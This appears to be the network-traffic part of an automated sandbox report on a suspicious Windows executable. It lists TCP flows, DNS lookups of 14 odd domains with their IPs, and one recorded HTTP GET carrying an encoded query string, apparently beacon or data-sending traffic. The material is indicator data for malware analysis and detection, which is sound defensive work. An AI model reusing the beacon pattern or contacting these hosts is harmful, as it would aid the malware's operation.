                                                        Nov 4, 2024 10:12:56.797681093 CET80500353.33.130.190192.168.2.4
                                                        Nov 4, 2024 10:12:58.308367968 CET5003580192.168.2.43.33.130.190
                                                        Nov 4, 2024 10:12:58.313643932 CET80500353.33.130.190192.168.2.4
                                                        Nov 4, 2024 10:12:58.313690901 CET5003580192.168.2.43.33.130.190
                                                        Nov 4, 2024 10:12:59.329735994 CET5003680192.168.2.43.33.130.190
                                                        Nov 4, 2024 10:12:59.334603071 CET80500363.33.130.190192.168.2.4
                                                        Nov 4, 2024 10:12:59.334727049 CET5003680192.168.2.43.33.130.190
                                                        Nov 4, 2024 10:12:59.346471071 CET5003680192.168.2.43.33.130.190
                                                        Nov 4, 2024 10:12:59.351341009 CET80500363.33.130.190192.168.2.4
                                                        Nov 4, 2024 10:12:59.961657047 CET80500363.33.130.190192.168.2.4
                                                        Nov 4, 2024 10:12:59.961740017 CET5003680192.168.2.43.33.130.190
                                                        Nov 4, 2024 10:13:00.855837107 CET5003680192.168.2.43.33.130.190
                                                        Nov 4, 2024 10:13:00.860631943 CET80500363.33.130.190192.168.2.4
                                                        Nov 4, 2024 10:13:01.875571012 CET5003780192.168.2.43.33.130.190
                                                        Nov 4, 2024 10:13:01.880769968 CET80500373.33.130.190192.168.2.4
                                                        Nov 4, 2024 10:13:01.880850077 CET5003780192.168.2.43.33.130.190
                                                        Nov 4, 2024 10:13:01.905317068 CET5003780192.168.2.43.33.130.190
                                                        Nov 4, 2024 10:13:01.910276890 CET80500373.33.130.190192.168.2.4
                                                        Nov 4, 2024 10:13:01.910300970 CET80500373.33.130.190192.168.2.4
                                                        Nov 4, 2024 10:13:01.910355091 CET80500373.33.130.190192.168.2.4
                                                        Nov 4, 2024 10:13:01.910365105 CET80500373.33.130.190192.168.2.4
                                                        Nov 4, 2024 10:13:01.910382032 CET80500373.33.130.190192.168.2.4
                                                        Nov 4, 2024 10:13:01.910393000 CET80500373.33.130.190192.168.2.4
                                                        Nov 4, 2024 10:13:01.910427094 CET80500373.33.130.190192.168.2.4
                                                        Nov 4, 2024 10:13:01.910437107 CET80500373.33.130.190192.168.2.4
                                                        Nov 4, 2024 10:13:01.910446882 CET80500373.33.130.190192.168.2.4
                                                        Nov 4, 2024 10:13:03.418080091 CET5003780192.168.2.43.33.130.190
                                                        Nov 4, 2024 10:13:03.424696922 CET80500373.33.130.190192.168.2.4
                                                        Nov 4, 2024 10:13:03.424887896 CET5003780192.168.2.43.33.130.190
                                                        Nov 4, 2024 10:13:04.466332912 CET5003880192.168.2.43.33.130.190
                                                        Nov 4, 2024 10:13:04.471262932 CET80500383.33.130.190192.168.2.4
                                                        Nov 4, 2024 10:13:04.471344948 CET5003880192.168.2.43.33.130.190
                                                        Nov 4, 2024 10:13:04.536524057 CET5003880192.168.2.43.33.130.190
                                                        Nov 4, 2024 10:13:04.542395115 CET80500383.33.130.190192.168.2.4
                                                        Nov 4, 2024 10:13:12.176579952 CET80500383.33.130.190192.168.2.4
                                                        Nov 4, 2024 10:13:12.177172899 CET80500383.33.130.190192.168.2.4
                                                        Nov 4, 2024 10:13:12.177217960 CET5003880192.168.2.43.33.130.190
                                                        Nov 4, 2024 10:13:12.179804087 CET5003880192.168.2.43.33.130.190
                                                        Nov 4, 2024 10:13:12.184577942 CET80500383.33.130.190192.168.2.4
                                                        Nov 4, 2024 10:13:17.305697918 CET5003980192.168.2.4199.59.243.227
                                                        Nov 4, 2024 10:13:17.313232899 CET8050039199.59.243.227192.168.2.4
                                                        Nov 4, 2024 10:13:17.313600063 CET5003980192.168.2.4199.59.243.227
                                                        Nov 4, 2024 10:13:17.325706959 CET5003980192.168.2.4199.59.243.227
                                                        Nov 4, 2024 10:13:17.330733061 CET8050039199.59.243.227192.168.2.4
                                                        Nov 4, 2024 10:13:17.958456993 CET8050039199.59.243.227192.168.2.4
                                                        Nov 4, 2024 10:13:17.958533049 CET8050039199.59.243.227192.168.2.4
                                                        Nov 4, 2024 10:13:17.958576918 CET5003980192.168.2.4199.59.243.227
                                                        Nov 4, 2024 10:13:17.959069967 CET8050039199.59.243.227192.168.2.4
                                                        Nov 4, 2024 10:13:17.959114075 CET5003980192.168.2.4199.59.243.227
                                                        Nov 4, 2024 10:13:18.839982033 CET5003980192.168.2.4199.59.243.227
                                                        Nov 4, 2024 10:13:19.859992981 CET5004080192.168.2.4199.59.243.227
                                                        Nov 4, 2024 10:13:19.865432024 CET8050040199.59.243.227192.168.2.4
                                                        Nov 4, 2024 10:13:19.865506887 CET5004080192.168.2.4199.59.243.227
                                                        Nov 4, 2024 10:13:19.879949093 CET5004080192.168.2.4199.59.243.227
                                                        Nov 4, 2024 10:13:19.885241985 CET8050040199.59.243.227192.168.2.4
                                                        Nov 4, 2024 10:13:20.518059015 CET8050040199.59.243.227192.168.2.4
                                                        Nov 4, 2024 10:13:20.518219948 CET8050040199.59.243.227192.168.2.4
                                                        Nov 4, 2024 10:13:20.518297911 CET5004080192.168.2.4199.59.243.227
                                                        Nov 4, 2024 10:13:20.518577099 CET8050040199.59.243.227192.168.2.4
                                                        Nov 4, 2024 10:13:20.518652916 CET5004080192.168.2.4199.59.243.227
                                                        Nov 4, 2024 10:13:21.389807940 CET5004080192.168.2.4199.59.243.227
                                                        Nov 4, 2024 10:13:22.405998945 CET5004180192.168.2.4199.59.243.227
                                                        Nov 4, 2024 10:13:22.772861004 CET8050041199.59.243.227192.168.2.4
                                                        Nov 4, 2024 10:13:22.773056984 CET5004180192.168.2.4199.59.243.227
                                                        Nov 4, 2024 10:13:22.784719944 CET5004180192.168.2.4199.59.243.227
                                                        Nov 4, 2024 10:13:22.789805889 CET8050041199.59.243.227192.168.2.4
                                                        Nov 4, 2024 10:13:22.789982080 CET8050041199.59.243.227192.168.2.4
                                                        Nov 4, 2024 10:13:22.789988995 CET8050041199.59.243.227192.168.2.4
                                                        Nov 4, 2024 10:13:22.790000916 CET8050041199.59.243.227192.168.2.4
                                                        Nov 4, 2024 10:13:22.790007114 CET8050041199.59.243.227192.168.2.4
                                                        Nov 4, 2024 10:13:22.790016890 CET8050041199.59.243.227192.168.2.4
                                                        Nov 4, 2024 10:13:22.790113926 CET8050041199.59.243.227192.168.2.4
                                                        Nov 4, 2024 10:13:22.790117979 CET8050041199.59.243.227192.168.2.4
                                                        Nov 4, 2024 10:13:22.790122032 CET8050041199.59.243.227192.168.2.4
                                                        Nov 4, 2024 10:13:23.438755035 CET8050041199.59.243.227192.168.2.4
                                                        Nov 4, 2024 10:13:23.438774109 CET8050041199.59.243.227192.168.2.4
                                                        Nov 4, 2024 10:13:23.439512968 CET8050041199.59.243.227192.168.2.4
                                                        Nov 4, 2024 10:13:23.439968109 CET5004180192.168.2.4199.59.243.227
                                                        Nov 4, 2024 10:13:24.292857885 CET5004180192.168.2.4199.59.243.227
                                                        Nov 4, 2024 10:13:25.311808109 CET5004280192.168.2.4199.59.243.227
                                                        Nov 4, 2024 10:13:25.317235947 CET8050042199.59.243.227192.168.2.4
                                                        Nov 4, 2024 10:13:25.317431927 CET5004280192.168.2.4199.59.243.227
                                                        Nov 4, 2024 10:13:25.325371981 CET5004280192.168.2.4199.59.243.227
                                                        Nov 4, 2024 10:13:25.330451012 CET8050042199.59.243.227192.168.2.4
                                                        Nov 4, 2024 10:13:26.300266027 CET8050042199.59.243.227192.168.2.4
                                                        Nov 4, 2024 10:13:26.300355911 CET8050042199.59.243.227192.168.2.4
                                                        Nov 4, 2024 10:13:26.300451994 CET5004280192.168.2.4199.59.243.227
                                                        Nov 4, 2024 10:13:26.301306009 CET8050042199.59.243.227192.168.2.4
                                                        Nov 4, 2024 10:13:26.301352024 CET5004280192.168.2.4199.59.243.227
                                                        Nov 4, 2024 10:13:26.303957939 CET5004280192.168.2.4199.59.243.227
                                                        Nov 4, 2024 10:13:26.308804989 CET8050042199.59.243.227192.168.2.4
                                                        Nov 4, 2024 10:13:31.480101109 CET5004380192.168.2.4217.160.0.111
                                                        Nov 4, 2024 10:13:31.484958887 CET8050043217.160.0.111192.168.2.4
                                                        Nov 4, 2024 10:13:31.485882044 CET5004380192.168.2.4217.160.0.111
                                                        Nov 4, 2024 10:13:31.497531891 CET5004380192.168.2.4217.160.0.111
                                                        Nov 4, 2024 10:13:31.503119946 CET8050043217.160.0.111192.168.2.4
                                                        Nov 4, 2024 10:13:32.334312916 CET8050043217.160.0.111192.168.2.4
                                                        Nov 4, 2024 10:13:32.386564016 CET5004380192.168.2.4217.160.0.111
                                                        Nov 4, 2024 10:13:32.465926886 CET8050043217.160.0.111192.168.2.4
                                                        Nov 4, 2024 10:13:32.465985060 CET5004380192.168.2.4217.160.0.111
                                                        Nov 4, 2024 10:13:33.011584044 CET5004380192.168.2.4217.160.0.111
                                                        Nov 4, 2024 10:13:34.031435013 CET5004480192.168.2.4217.160.0.111
                                                        Nov 4, 2024 10:13:34.037636995 CET8050044217.160.0.111192.168.2.4
                                                        Nov 4, 2024 10:13:34.037723064 CET5004480192.168.2.4217.160.0.111
                                                        Nov 4, 2024 10:13:34.051765919 CET5004480192.168.2.4217.160.0.111
                                                        Nov 4, 2024 10:13:34.056694031 CET8050044217.160.0.111192.168.2.4
                                                        Nov 4, 2024 10:13:34.922955990 CET8050044217.160.0.111192.168.2.4
                                                        Nov 4, 2024 10:13:34.981740952 CET5004480192.168.2.4217.160.0.111
                                                        Nov 4, 2024 10:13:35.050980091 CET8050044217.160.0.111192.168.2.4
                                                        Nov 4, 2024 10:13:35.051162004 CET5004480192.168.2.4217.160.0.111
                                                        Nov 4, 2024 10:13:35.558454037 CET5004480192.168.2.4217.160.0.111
                                                        Nov 4, 2024 10:13:36.577656984 CET5004580192.168.2.4217.160.0.111
                                                        Nov 4, 2024 10:13:36.582516909 CET8050045217.160.0.111192.168.2.4
                                                        Nov 4, 2024 10:13:36.582582951 CET5004580192.168.2.4217.160.0.111
                                                        Nov 4, 2024 10:13:36.595967054 CET5004580192.168.2.4217.160.0.111
                                                        Nov 4, 2024 10:13:36.600884914 CET8050045217.160.0.111192.168.2.4
                                                        Nov 4, 2024 10:13:36.600900888 CET8050045217.160.0.111192.168.2.4
                                                        Nov 4, 2024 10:13:36.600929976 CET8050045217.160.0.111192.168.2.4
                                                        Nov 4, 2024 10:13:36.600963116 CET8050045217.160.0.111192.168.2.4
                                                        Nov 4, 2024 10:13:36.601047993 CET8050045217.160.0.111192.168.2.4
                                                        Nov 4, 2024 10:13:36.601058960 CET8050045217.160.0.111192.168.2.4
                                                        Nov 4, 2024 10:13:36.601063013 CET8050045217.160.0.111192.168.2.4
                                                        Nov 4, 2024 10:13:36.601068020 CET8050045217.160.0.111192.168.2.4
                                                        Nov 4, 2024 10:13:36.601078033 CET8050045217.160.0.111192.168.2.4
                                                        Nov 4, 2024 10:13:37.431473017 CET8050045217.160.0.111192.168.2.4
                                                        Nov 4, 2024 10:13:37.485727072 CET5004580192.168.2.4217.160.0.111
                                                        Nov 4, 2024 10:13:37.553992033 CET8050045217.160.0.111192.168.2.4
                                                        Nov 4, 2024 10:13:37.554049015 CET5004580192.168.2.4217.160.0.111
                                                        Nov 4, 2024 10:13:38.105482101 CET5004580192.168.2.4217.160.0.111
                                                        Nov 4, 2024 10:13:39.125801086 CET5004680192.168.2.4217.160.0.111
                                                        Nov 4, 2024 10:13:39.130683899 CET8050046217.160.0.111192.168.2.4
                                                        Nov 4, 2024 10:13:39.131870985 CET5004680192.168.2.4217.160.0.111
                                                        Nov 4, 2024 10:13:39.139338970 CET5004680192.168.2.4217.160.0.111
                                                        Nov 4, 2024 10:13:39.144293070 CET8050046217.160.0.111192.168.2.4
                                                        Nov 4, 2024 10:13:39.985613108 CET8050046217.160.0.111192.168.2.4
                                                        Nov 4, 2024 10:13:39.985734940 CET8050046217.160.0.111192.168.2.4
                                                        Nov 4, 2024 10:13:39.985829115 CET5004680192.168.2.4217.160.0.111
                                                        Nov 4, 2024 10:13:40.109244108 CET8050046217.160.0.111192.168.2.4
                                                        Nov 4, 2024 10:13:40.109342098 CET5004680192.168.2.4217.160.0.111
                                                        Nov 4, 2024 10:13:40.110296011 CET5004680192.168.2.4217.160.0.111
                                                        Nov 4, 2024 10:13:40.115044117 CET8050046217.160.0.111192.168.2.4
                                                        Nov 4, 2024 10:13:45.608084917 CET5004780192.168.2.4168.76.221.252
                                                        Nov 4, 2024 10:13:45.612962008 CET8050047168.76.221.252192.168.2.4
                                                        Nov 4, 2024 10:13:45.613847971 CET5004780192.168.2.4168.76.221.252
                                                        Nov 4, 2024 10:13:45.625785112 CET5004780192.168.2.4168.76.221.252
                                                        Nov 4, 2024 10:13:45.630711079 CET8050047168.76.221.252192.168.2.4
                                                        Nov 4, 2024 10:13:46.766381979 CET8050047168.76.221.252192.168.2.4
                                                        Nov 4, 2024 10:13:46.766436100 CET5004780192.168.2.4168.76.221.252
                                                        Nov 4, 2024 10:13:47.137753963 CET5004780192.168.2.4168.76.221.252
                                                        Nov 4, 2024 10:13:47.142673969 CET8050047168.76.221.252192.168.2.4
                                                        Nov 4, 2024 10:13:48.156163931 CET5004880192.168.2.4168.76.221.252
                                                        Nov 4, 2024 10:13:48.161026955 CET8050048168.76.221.252192.168.2.4
                                                        Nov 4, 2024 10:13:48.161092997 CET5004880192.168.2.4168.76.221.252
                                                        Nov 4, 2024 10:13:48.176172018 CET5004880192.168.2.4168.76.221.252
                                                        Nov 4, 2024 10:13:48.181072950 CET8050048168.76.221.252192.168.2.4
                                                        Nov 4, 2024 10:13:49.304898977 CET8050048168.76.221.252192.168.2.4
                                                        Nov 4, 2024 10:13:49.305845976 CET5004880192.168.2.4168.76.221.252
                                                        Nov 4, 2024 10:13:49.683487892 CET5004880192.168.2.4168.76.221.252
                                                        Nov 4, 2024 10:13:49.688478947 CET8050048168.76.221.252192.168.2.4
                                                        Nov 4, 2024 10:13:50.703011990 CET5004980192.168.2.4168.76.221.252
                                                        Nov 4, 2024 10:13:50.707851887 CET8050049168.76.221.252192.168.2.4
                                                        Nov 4, 2024 10:13:50.707926989 CET5004980192.168.2.4168.76.221.252
                                                        Nov 4, 2024 10:13:50.723597050 CET5004980192.168.2.4168.76.221.252
                                                        Nov 4, 2024 10:13:50.728552103 CET8050049168.76.221.252192.168.2.4
                                                        Nov 4, 2024 10:13:50.728590012 CET8050049168.76.221.252192.168.2.4
                                                        Nov 4, 2024 10:13:50.728621960 CET8050049168.76.221.252192.168.2.4
                                                        Nov 4, 2024 10:13:50.728626013 CET8050049168.76.221.252192.168.2.4
                                                        Nov 4, 2024 10:13:50.728651047 CET8050049168.76.221.252192.168.2.4
                                                        Nov 4, 2024 10:13:50.728655100 CET8050049168.76.221.252192.168.2.4
                                                        Nov 4, 2024 10:13:50.728702068 CET8050049168.76.221.252192.168.2.4
                                                        Nov 4, 2024 10:13:50.728707075 CET8050049168.76.221.252192.168.2.4
                                                        Nov 4, 2024 10:13:50.728713036 CET8050049168.76.221.252192.168.2.4
                                                        Nov 4, 2024 10:13:51.680054903 CET8050049168.76.221.252192.168.2.4
                                                        Nov 4, 2024 10:13:51.683850050 CET5004980192.168.2.4168.76.221.252
                                                        Nov 4, 2024 10:13:52.230551958 CET5004980192.168.2.4168.76.221.252
                                                        Nov 4, 2024 10:13:52.235555887 CET8050049168.76.221.252192.168.2.4
                                                        Nov 4, 2024 10:13:53.276170015 CET5005080192.168.2.4168.76.221.252
                                                        Nov 4, 2024 10:13:53.373296022 CET8050050168.76.221.252192.168.2.4
                                                        Nov 4, 2024 10:13:53.375962973 CET5005080192.168.2.4168.76.221.252
                                                        Nov 4, 2024 10:13:53.387837887 CET5005080192.168.2.4168.76.221.252
                                                        Nov 4, 2024 10:13:53.392647028 CET8050050168.76.221.252192.168.2.4
                                                        Nov 4, 2024 10:13:54.517677069 CET8050050168.76.221.252192.168.2.4
                                                        Nov 4, 2024 10:13:54.517791033 CET5005080192.168.2.4168.76.221.252
                                                        Nov 4, 2024 10:13:54.519084930 CET5005080192.168.2.4168.76.221.252
                                                        Nov 4, 2024 10:13:54.524074078 CET8050050168.76.221.252192.168.2.4
                                                        Nov 4, 2024 10:13:59.629169941 CET5005180192.168.2.4185.179.189.193
                                                        Nov 4, 2024 10:13:59.634089947 CET8050051185.179.189.193192.168.2.4
                                                        Nov 4, 2024 10:13:59.634463072 CET5005180192.168.2.4185.179.189.193
                                                        Nov 4, 2024 10:13:59.645554066 CET5005180192.168.2.4185.179.189.193
                                                        Nov 4, 2024 10:13:59.650311947 CET8050051185.179.189.193192.168.2.4
                                                        Nov 4, 2024 10:14:00.640861034 CET8050051185.179.189.193192.168.2.4
                                                        Nov 4, 2024 10:14:00.640980005 CET8050051185.179.189.193192.168.2.4
                                                        Nov 4, 2024 10:14:00.641081095 CET5005180192.168.2.4185.179.189.193
                                                        Nov 4, 2024 10:14:00.641124964 CET8050051185.179.189.193192.168.2.4
                                                        Nov 4, 2024 10:14:00.641449928 CET8050051185.179.189.193192.168.2.4
                                                        Nov 4, 2024 10:14:00.641455889 CET8050051185.179.189.193192.168.2.4
                                                        Nov 4, 2024 10:14:00.641505957 CET5005180192.168.2.4185.179.189.193
                                                        Nov 4, 2024 10:14:00.642085075 CET8050051185.179.189.193192.168.2.4
                                                        Nov 4, 2024 10:14:00.642091990 CET8050051185.179.189.193192.168.2.4
                                                        Nov 4, 2024 10:14:00.642133951 CET5005180192.168.2.4185.179.189.193
                                                        Nov 4, 2024 10:14:00.642688990 CET8050051185.179.189.193192.168.2.4
                                                        Nov 4, 2024 10:14:00.642729044 CET5005180192.168.2.4185.179.189.193
                                                        Nov 4, 2024 10:14:00.790349007 CET8050051185.179.189.193192.168.2.4
                                                        Nov 4, 2024 10:14:00.790397882 CET5005180192.168.2.4185.179.189.193
                                                        Nov 4, 2024 10:14:01.667908907 CET5005180192.168.2.4185.179.189.193
                                                        Nov 4, 2024 10:14:02.686382055 CET5005280192.168.2.4185.179.189.193
                                                        Nov 4, 2024 10:14:02.691453934 CET8050052185.179.189.193192.168.2.4
                                                        Nov 4, 2024 10:14:02.693882942 CET5005280192.168.2.4185.179.189.193
                                                        Nov 4, 2024 10:14:02.704837084 CET5005280192.168.2.4185.179.189.193
                                                        Nov 4, 2024 10:14:02.710020065 CET8050052185.179.189.193192.168.2.4
                                                        Nov 4, 2024 10:14:03.717515945 CET8050052185.179.189.193192.168.2.4
                                                        Nov 4, 2024 10:14:03.717622042 CET8050052185.179.189.193192.168.2.4
                                                        Nov 4, 2024 10:14:03.717633009 CET8050052185.179.189.193192.168.2.4
                                                        Nov 4, 2024 10:14:03.717669010 CET5005280192.168.2.4185.179.189.193
                                                        Nov 4, 2024 10:14:03.718060017 CET8050052185.179.189.193192.168.2.4
                                                        Nov 4, 2024 10:14:03.718071938 CET8050052185.179.189.193192.168.2.4
                                                        Nov 4, 2024 10:14:03.718085051 CET8050052185.179.189.193192.168.2.4
                                                        Nov 4, 2024 10:14:03.718125105 CET5005280192.168.2.4185.179.189.193
                                                        Nov 4, 2024 10:14:03.718868017 CET8050052185.179.189.193192.168.2.4
                                                        Nov 4, 2024 10:14:03.718880892 CET8050052185.179.189.193192.168.2.4
                                                        Nov 4, 2024 10:14:03.718915939 CET5005280192.168.2.4185.179.189.193
                                                        Nov 4, 2024 10:14:03.876471996 CET8050052185.179.189.193192.168.2.4
                                                        Nov 4, 2024 10:14:03.876524925 CET5005280192.168.2.4185.179.189.193
                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Nov 4, 2024 10:10:50.291186094 CET6511553192.168.2.41.1.1.1
                                                        Nov 4, 2024 10:10:50.324906111 CET53651151.1.1.1192.168.2.4
                                                        Nov 4, 2024 10:11:07.030610085 CET6034353192.168.2.41.1.1.1
                                                        Nov 4, 2024 10:11:07.103246927 CET53603431.1.1.1192.168.2.4
                                                        Nov 4, 2024 10:11:20.436469078 CET5945753192.168.2.41.1.1.1
                                                        Nov 4, 2024 10:11:20.532737017 CET53594571.1.1.1192.168.2.4
                                                        Nov 4, 2024 10:11:33.921128035 CET5570553192.168.2.41.1.1.1
                                                        Nov 4, 2024 10:11:33.933542967 CET53557051.1.1.1192.168.2.4
                                                        Nov 4, 2024 10:11:47.734350920 CET6441253192.168.2.41.1.1.1
                                                        Nov 4, 2024 10:11:47.757488012 CET53644121.1.1.1192.168.2.4
                                                        Nov 4, 2024 10:12:01.280463934 CET6118853192.168.2.41.1.1.1
                                                        Nov 4, 2024 10:12:01.292308092 CET53611881.1.1.1192.168.2.4
                                                        Nov 4, 2024 10:12:15.546422958 CET5851753192.168.2.41.1.1.1
                                                        Nov 4, 2024 10:12:15.593027115 CET53585171.1.1.1192.168.2.4
                                                        Nov 4, 2024 10:12:29.187151909 CET6415053192.168.2.41.1.1.1
                                                        Nov 4, 2024 10:12:29.204574108 CET53641501.1.1.1192.168.2.4
                                                        Nov 4, 2024 10:12:42.593579054 CET5968353192.168.2.41.1.1.1
                                                        Nov 4, 2024 10:12:43.072535992 CET53596831.1.1.1192.168.2.4
                                                        Nov 4, 2024 10:12:56.734651089 CET5114453192.168.2.41.1.1.1
                                                        Nov 4, 2024 10:12:56.768651009 CET53511441.1.1.1192.168.2.4
                                                        Nov 4, 2024 10:13:17.189733982 CET5091653192.168.2.41.1.1.1
                                                        Nov 4, 2024 10:13:17.300240993 CET53509161.1.1.1192.168.2.4
                                                        Nov 4, 2024 10:13:31.313060045 CET5978553192.168.2.41.1.1.1
                                                        Nov 4, 2024 10:13:31.476702929 CET53597851.1.1.1192.168.2.4
                                                        Nov 4, 2024 10:13:45.124957085 CET5865453192.168.2.41.1.1.1
                                                        Nov 4, 2024 10:13:45.604346991 CET53586541.1.1.1192.168.2.4
                                                        Nov 4, 2024 10:13:59.533781052 CET5937853192.168.2.41.1.1.1
                                                        Nov 4, 2024 10:13:59.626602888 CET53593781.1.1.1192.168.2.4
                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Nov 4, 2024 10:10:50.291186094 CET192.168.2.41.1.1.10x5b79Standard query (0)www.budged.netA (IP address)IN (0x0001)false
                                                        Nov 4, 2024 10:11:07.030610085 CET192.168.2.41.1.1.10x28a0Standard query (0)www.cursosonline.bioA (IP address)IN (0x0001)false
                                                        Nov 4, 2024 10:11:20.436469078 CET192.168.2.41.1.1.10x2b5bStandard query (0)www.prediksipreman.fyiA (IP address)IN (0x0001)false
                                                        Nov 4, 2024 10:11:33.921128035 CET192.168.2.41.1.1.10x598Standard query (0)www.98yl9900.vipA (IP address)IN (0x0001)false
                                                        Nov 4, 2024 10:11:47.734350920 CET192.168.2.41.1.1.10x8d37Standard query (0)www.mjmegartravel.onlineA (IP address)IN (0x0001)false
                                                        Nov 4, 2024 10:12:01.280463934 CET192.168.2.41.1.1.10x13a7Standard query (0)www.energyparks.netA (IP address)IN (0x0001)false
                                                        Nov 4, 2024 10:12:15.546422958 CET192.168.2.41.1.1.10x4f5Standard query (0)www.electronify.shopA (IP address)IN (0x0001)false
                                                        Nov 4, 2024 10:12:29.187151909 CET192.168.2.41.1.1.10x7010Standard query (0)www.sibeta.infoA (IP address)IN (0x0001)false
                                                        Nov 4, 2024 10:12:42.593579054 CET192.168.2.41.1.1.10xd912Standard query (0)www.j252mv.siteA (IP address)IN (0x0001)false
                                                        Nov 4, 2024 10:12:56.734651089 CET192.168.2.41.1.1.10x825Standard query (0)www.dwmdconsulting.llcA (IP address)IN (0x0001)false
                                                        Nov 4, 2024 10:13:17.189733982 CET192.168.2.41.1.1.10x8debStandard query (0)www.deepfy.xyzA (IP address)IN (0x0001)false
                                                        Nov 4, 2024 10:13:31.313060045 CET192.168.2.41.1.1.10x1408Standard query (0)www.time-change.fyiA (IP address)IN (0x0001)false
                                                        Nov 4, 2024 10:13:45.124957085 CET192.168.2.41.1.1.10xd1fcStandard query (0)www.5hdgb2p9a.buzzA (IP address)IN (0x0001)false
                                                        Nov 4, 2024 10:13:59.533781052 CET192.168.2.41.1.1.10xb232Standard query (0)www.jivatop.onlineA (IP address)IN (0x0001)false
                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Nov 4, 2024 10:10:50.324906111 CET1.1.1.1192.168.2.40x5b79No error (0)www.budged.netbudged.netCNAME (Canonical name)IN (0x0001)false
                                                        Nov 4, 2024 10:10:50.324906111 CET1.1.1.1192.168.2.40x5b79No error (0)budged.net195.154.200.15A (IP address)IN (0x0001)false
                                                        Nov 4, 2024 10:11:07.103246927 CET1.1.1.1192.168.2.40x28a0No error (0)www.cursosonline.bio199.59.243.227A (IP address)IN (0x0001)false
                                                        Nov 4, 2024 10:11:20.532737017 CET1.1.1.1192.168.2.40x2b5bNo error (0)www.prediksipreman.fyiprediksipreman.fyiCNAME (Canonical name)IN (0x0001)false
                                                        Nov 4, 2024 10:11:20.532737017 CET1.1.1.1192.168.2.40x2b5bNo error (0)prediksipreman.fyi162.0.215.244A (IP address)IN (0x0001)false
                                                        Nov 4, 2024 10:11:33.933542967 CET1.1.1.1192.168.2.40x598No error (0)www.98yl9900.vip104.21.3.144A (IP address)IN (0x0001)false
                                                        Nov 4, 2024 10:11:33.933542967 CET1.1.1.1192.168.2.40x598No error (0)www.98yl9900.vip172.67.130.209A (IP address)IN (0x0001)false
                                                        Nov 4, 2024 10:11:47.757488012 CET1.1.1.1192.168.2.40x8d37No error (0)www.mjmegartravel.onlinemjmegartravel.onlineCNAME (Canonical name)IN (0x0001)false
                                                        Nov 4, 2024 10:11:47.757488012 CET1.1.1.1192.168.2.40x8d37No error (0)mjmegartravel.online76.223.67.189A (IP address)IN (0x0001)false
                                                        Nov 4, 2024 10:11:47.757488012 CET1.1.1.1192.168.2.40x8d37No error (0)mjmegartravel.online13.248.213.45A (IP address)IN (0x0001)false
                                                        Nov 4, 2024 10:12:01.292308092 CET1.1.1.1192.168.2.40x13a7No error (0)www.energyparks.netenergyparks.netCNAME (Canonical name)IN (0x0001)false
                                                        Nov 4, 2024 10:12:01.292308092 CET1.1.1.1192.168.2.40x13a7No error (0)energyparks.net3.33.130.190A (IP address)IN (0x0001)false
                                                        Nov 4, 2024 10:12:01.292308092 CET1.1.1.1192.168.2.40x13a7No error (0)energyparks.net15.197.148.33A (IP address)IN (0x0001)false
                                                        Nov 4, 2024 10:12:15.593027115 CET1.1.1.1192.168.2.40x4f5No error (0)www.electronify.shopelectronify.shopCNAME (Canonical name)IN (0x0001)false
                                                        Nov 4, 2024 10:12:15.593027115 CET1.1.1.1192.168.2.40x4f5No error (0)electronify.shop84.32.84.32A (IP address)IN (0x0001)false
                                                        Nov 4, 2024 10:12:29.204574108 CET1.1.1.1192.168.2.40x7010No error (0)www.sibeta.info162.0.231.203A (IP address)IN (0x0001)false
                                                        Nov 4, 2024 10:12:43.072535992 CET1.1.1.1192.168.2.40xd912No error (0)www.j252mv.site150.95.254.16A (IP address)IN (0x0001)false
                                                        Nov 4, 2024 10:12:56.768651009 CET1.1.1.1192.168.2.40x825No error (0)www.dwmdconsulting.llcdwmdconsulting.llcCNAME (Canonical name)IN (0x0001)false
                                                        Nov 4, 2024 10:12:56.768651009 CET1.1.1.1192.168.2.40x825No error (0)dwmdconsulting.llc3.33.130.190A (IP address)IN (0x0001)false
                                                        Nov 4, 2024 10:12:56.768651009 CET1.1.1.1192.168.2.40x825No error (0)dwmdconsulting.llc15.197.148.33A (IP address)IN (0x0001)false
                                                        Nov 4, 2024 10:13:17.300240993 CET1.1.1.1192.168.2.40x8debNo error (0)www.deepfy.xyz199.59.243.227A (IP address)IN (0x0001)false
                                                        Nov 4, 2024 10:13:31.476702929 CET1.1.1.1192.168.2.40x1408No error (0)www.time-change.fyi217.160.0.111A (IP address)IN (0x0001)false
                                                        Nov 4, 2024 10:13:45.604346991 CET1.1.1.1192.168.2.40xd1fcNo error (0)www.5hdgb2p9a.buzz168.76.221.252A (IP address)IN (0x0001)false
                                                        Nov 4, 2024 10:13:59.626602888 CET1.1.1.1192.168.2.40xb232No error (0)www.jivatop.online185.179.189.193A (IP address)IN (0x0001)false
                                                        • www.budged.net
                                                        • www.cursosonline.bio
                                                        • www.prediksipreman.fyi
                                                        • www.98yl9900.vip
                                                        • www.mjmegartravel.online
                                                        • www.energyparks.net
                                                        • www.electronify.shop
                                                        • www.sibeta.info
                                                        • www.j252mv.site
                                                        • www.dwmdconsulting.llc
                                                        • www.deepfy.xyz
                                                        • www.time-change.fyi
                                                        • www.5hdgb2p9a.buzz
                                                        • www.jivatop.online
                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.449736195.154.200.15805332C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 4, 2024 10:10:50.343189001 CET462OUTGET /rwi3/?Q8r=3l9HWofhi4qI6FgwzBgfqCSqepMbi+x/tP4hcqqML+ok6ico/8tPHaiq8anAIRqTRw/AlsoC6MOKOJSN91dw5wR1aaSWnnHTBS7NSUaA1IBUrmZ191OmHzE=&6trpq=anQT3n HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                        Accept-Language: en-US,en;q=0.5
                                                        Host: www.budged.net
                                                        Connection: close
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13
                                                        Nov 4, 2024 10:10:51.878318071 CET1236INHTTP/1.0 404 Not Found
                                                        Date: Mon, 04 Nov 2024 09:10:51 GMT
                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.33
